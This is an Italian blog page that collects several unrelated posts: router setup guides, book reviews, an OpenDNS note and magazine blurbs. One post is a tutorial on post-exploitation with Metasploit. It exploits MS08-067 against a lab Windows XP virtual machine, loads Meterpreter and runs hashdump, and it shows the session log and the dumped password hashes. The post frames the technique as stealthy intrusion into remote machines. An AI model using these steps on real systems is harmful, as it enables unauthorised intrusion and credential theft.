Su questo articolo di Croccobiscotto vengono riportati alcuni consigli utili per analizzare le risorse occupate da apache e wordpress su diversi carichi di lavoro.
http://www.croccobiscotto.it/linux/apache-wordpress-stress-test/
David BigagliSu questo articolo di Croccobiscotto vengono riportati alcuni consigli utili per analizzare le risorse occupate da apache e wordpress su diversi carichi di lavoro.
http://www.croccobiscotto.it/linux/apache-wordpress-stress-test/
David BigagliCraccare le password di Windows è ormai un gioco da ragazzi. Addirittura con Kon-Boot è possibile loggarsi in qualsiasi Linux o Windows aggirando il meccanismo di autenticazione. Tutto questo a patto che si abbia accesso fisico alla macchina. Se il computer dal quale vogliamo prelevare (e quindi craccare) le password si trova in un luogo a noi inaccessibile (o in un altro continente…) le cose si complicano. Ma non troppo.
Questo articolo completa un precedente post: “Hackerare Windows con Metasploit“. Chi se lo è perso se lo vada a rileggere e poi si iscriva a PillolHacking.Net per evitare di perdere i prossimi articoli.
Nel suddetto articolo viene mostrato come accedere da remoto a Windows sfruttando un recente bug, utilizzando Metasploit Framework, potentissimo strumento per effettuare penetration test.
Il precedente articolo si fermava dopo avere effettuato l’intrusione. Questa volta parliamo di cosa fare dopo aver effettuato un accesso remoto sulla macchina target.
Avere accesso ad una shell Windows da remoto è molto utile e si possono già fare diverse cose per mantenere un accesso anche nel caso in cui il bug venisse patchato. Ricordo che entrare continuamente in un computer tramite un exploit non è un’idea brillante, per diversi motivi. Uno di questi è che aumenta il rischio di essere scoperti, e può bastare.
Quindi una volta entrati in un sistema è possibile installare una backdoor. Per esempio è possibile aggiungere un utente con privilegi di amministratore. Ma qualsiasi backdoor può essere scoperta.
Il modo migliore per effettuare un’intrusione furtiva, da autentico fantasma della rete, è entrare, prelevare il SAM database, ovvero il file dove vengono memorizzate le password cifrate, craccarle e tornare nel sistema come un qualsiasi utente autorizzato, il tutto senza dare nell’occhio. Per non dimenticare un altro aspetto del password cracking: spesso gli utenti usano la stessa password per diversi servizi/sistemi. Recuperando la password di un sistema può aprire le porte a sistemi ben più preziosi all’interno di una organizzazione.
Per ottenere il nostro scopo, ovvero prelevare il SAM database da remoto utilizzeremo uno strumento spettacolare: Meterpreter. Si tratta di un modulo di Metasploit per la fase di post-penetration. Viene iniettato direttamente dall’exploit nel sistema remoto e mette a disposizione dell’hacker un ambiente in grado di effettuare qualsiasi operazione sul sistema target. Prima della nascita di Meterpreter questa fase era assai più complessa, visto che prevede la necessità di caricare in qualche modo tools aggiuntivi sul server. Con Meterpreter non serve nulla. Eventuali nuovi moduli possono essere caricati con un semplice comando.
Torniamo alle password. Per recuperare il SAM database della macchina target utilizziamo il comando hashdump di Meterpreter. L’operazione è semplicissima: una volta effettuata l’intrusione è necessario attivare il modulo priv (user priv) e di seguito invocare il comando hashdump.
Per quanto riguarda i dettagli per effettuare l’intrusione rimando all’articolo già citato. La differenza da quell’aticolo è il payload utilizzato. Se in quell’occasione avevo utilizzato un semplice shell/bind_tcp:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp PAYLOAD => windows/shell/bind_tcp
Questa volta uso meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp
Questo è il log dell’esecuzione dell’exploit contro il mio Xp virtualizzato, la macchina più vulnerabile del pianeta, il cui indirizzo Ip è 192.168.132.128; la macchina dell’attaccante è una Batcktrack3 con Ip 192.168.132.129; l’exploit è il ms08_067_netapi:
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Italian
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.129:58221 -> 192.168.132.128:4444)
meterpreter > use priv
[-] The ‘priv’ extension has already been loaded.
meterpreter > hashdump
Administrator:500:68a828b9dbd542feaad3b435b51404ee:0ebd3febdb972b9d9a164b72f321e341:::
pippo:1004:68a828b9dbd542feaad3b435b51404ee:0ebd3febdb972b9d9a164b72f321e341:::
meterpreter >
Il gioco è fatto! Il dump del SAM database è stato effettuato. A questo punto non rimane che passare alla fase di cracking.
Dopo avere visto nella quinta parte come installare aMule sull’Asus wl500gp v2 questa volta passiamo a Bittorrent grazie al pacchetto transmission presente sui repository di optware.
Per potere installare transmission dobbiamo avere l’ambiente optware installato sul nostro router, per ulteriori approfondimenti rimando al post Asus wl-500gp v2 e dd-wrt (terza parte): Nas con samba2, swat e optware. Altro presupposto è l’avere una partizione di swap attiva per non in incorre in problemi di memoria, anche per questo rimando al solito post.
Per l’installazione e configurazione mi sono rifatto alla guida presente su http://www.dd-wrt.com/wiki/index.php/Transmission_daemon
Per eseguire l’installazione basta accedere alla shell del router con ssh/telnet e impartire il seguente comando:
/opt/bin/ipkg install transmission
Continue reading “Asus wl-500gp v2 e dd-wrt (sesta parte): Download machine con Bittorrent”
Alcune note riguardo la manutenzione di un sistema windos che necessita l’installazione dei driver.
Su spippolazine possiamo trovare un interessante articolo per riuscire a capire quali sono i driver da installare a partire dal bollino giallo con il punto esclamativo che windows utilizza in “Gestione periferiche” per identificare una periferica non installata.
Avendo l’id del vendor e l’id del devide su http://www.pcidatabase.com/ è possibile interrogare un database per recuperare informazini su tale hardware.
Invece su http://www.nodevice.com/ abbiamo un database di drivers windows per un’infinià di periferiche.
David BigagliIn questa quinta parte provo a descrive come trasformare il nostro router in una download machine grazie a aMule. Questo viene installato grazie ai repository di optware, che naturalmente deve essere già presente sul sistema. Altra prerogativa per fare funzionare il tutto è avere una partizione di swap attiva in quanto i 32MB del wl-500gpv2 non sono sufficienti per amule. Per installare optware e attivare la partizione di swap fate rifierimento alla terza parte dedicata all’Asus wl-500gp v2 e dd-wrt.
Per eseguire l’installazione di aMule dobbiamo accedere alla shell di dd-wrt (con ssh o telnet) e impartire il seguente comando:
/opt/bin/ipkg install amule
terminate l’installazione saranno presenti sul sistema i comandi amuled, amuleweb e amulecmd.
Continue reading “Asus wl-500gp v2 e dd-wrt (quinta parte): Download machine con aMule”
Tratto da Wikipedia
Spaghetti Hacker è ad oggi l’unico testo, per quanto oramai datato, che ha raccolto e documentato la storia “non ufficiale” della telematica italiana ed è stato il testo di riferimento per la prima generazione di hacker italiani e per chi aveva necessità di informazioni su un mondo, ora più “accessibile”, ma all’epoca praticamente ignoto.
La caratteristica del libro è innanzi tutto quella di avere dato spazio ai protagonisti, nel senso che una parte consistente delle informazioni che fornisce sono state acquisite dagli autori con interviste dirette. Inoltre, e anche in questo Spaghetti Hacker ha inaugurato un “genere”, miscela gli aspetti tecnici con quelli giuridici, secondo una formula che sarebbe stata ripresa, negli anni a venire, da molti altri libri. Spiegando in modo semplice le tecnicalità del linguaggio legale, il libro evidenzia, quasi con facoltà precognitive, i potenziali pericoli per la libertà della rete (censura, repressione, ottusità dei politici) che oggi si sono puntualmente verificati.
Titolo: Spaghetti Hacker
Autore: Stefano Chiccarelli, Andrea Monti
Ediore: Apogeo / 1997
In breve
“Entrate nell’ostico mondo dell’hacking seduti nella vostra comoda poltrona! Mitnick illustra con grande abilità dieci casi reali, offrendoci la rara occasione di poter penetrare nella mentalità degli hacker.” Tom Parker, analista di sicurezza informatica, fondatore della Global InterSec llc
Il libro
Mitnick offre con questo libro un sequel all’ormai celebre L’arte dell’inganno, questa volta intervistando una serie di gruppi hacker che hanno messo in atto alcune delle intrusioni più incredibili degli ultimi anni.
Ogni capitolo (dieci in totale) si apre con una “computer crime story” che si legge come un romanzo. Certo, è sicuramente sconcertante capire quanto sia vulnerabile il proprio conto in banca o vedere all’opera un gruppo di hacker innamorati del gioco d’azzardo che in pochi minuti fanno man bassa delle slot machine.
Come nell’Arte dell’inganno, nel raccontare queste storie, Mitnick illustra minuziosamente i passi tecnici utilizzati nel mettere a segno i diversi colpi.
Un libro che si legge con facilità e che, al contempo, ci proietta nel mondo della sicurezza, l’altra faccia della dimensione informatica in cui Mitnick è ormai impegnato come uno dei maggiori esperti mondiali.
Titolo: L’arte dell’intrusione
Autore: Kevin D. Mitnick
Ediore: Mondadori / 2008
Pagine: 304
Vedi anteprima su Google Books.
David BigagliOpenDns è un servizio che offre un DNS pubblico da utilizzare al posto di quello offerto dal nostro provider.
Utilizzando OpenDns possiamo usufruire di alcuni benefici, quali: una velocità e affidabilità maggiore di quella offerata del nostro provider, suggerimenti in caso di url digitate male, protezione anti-pishing, statistiche sul traffico web, ecc.
Una delle possibilità più interessanti è quella di poterlo utilizzare come parental control per proteggere la nostra famiglia da possibili visioni di siti web non desiderati (porno, social network, file sharing, ecc..)
100 mq per 100mila euro, ricaricabile come un cellulare grazie al sole e ma materiali hi-tech. Non è un sogno: a Settimo Torinese sta già nascendo.
Zero emissioni, zero bollette e nessun allacciamento alle reti pubbliche: l’idea è di un fisico di Arezzo. Grazie alla sua tecnologia, la casa di Cucinella diventa un modello di autonomia sostenibile.
Un buco nelle Alpi cambierà la geografia. 57 chilometri, inaugurazione prevista 2017: la galleria di base del Gottardo sarà la più lunga del mondo. E’ un’opera così complessa che segnerà una svolta nella storia della geoingegneria. Noi l’abbiamo visitata con Martin Herrenknecht, l’uomo che con le sue macchine sta realizzando un progetto visionario. E renderà la Svizzera come l’Olanda: piatta.
Emmanuele Jannini è l’uomo che al mondo ne sa più di ogni altro sui segreti dell'”abisso” delle donne. Potrebbe sembrare un primato che mal si associa al suo essere fervente monogamo, ma proprio perché tranquillo e amoroso padre di famiglia è riuscito senza pregiudizi a immortalare in un’istantanea il misteriosissimo e controverso gadget intimo del piacere interiore della vagina. Marchingegno in miniatura e pietra di volta di tutta l’ingegneria orgasmatica.
Trent’anni fa, ai tempi del Media Lab, inventava il mondo in cui viviamo oggi. Nel 1993, insieme a un gruppo di amici, ha avuto una visione chiamata Wired. Oggi ha mollato tutto per dedicarsi al suo progetto “One laptop per child”. A colazione con Nicolas Negroponte, l’uomo che vede il futuro.
Alla ricerca di una cura soterica per un mal di schiena cronico
By continuing to use the site, you agree to the use of cookies. more information
The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.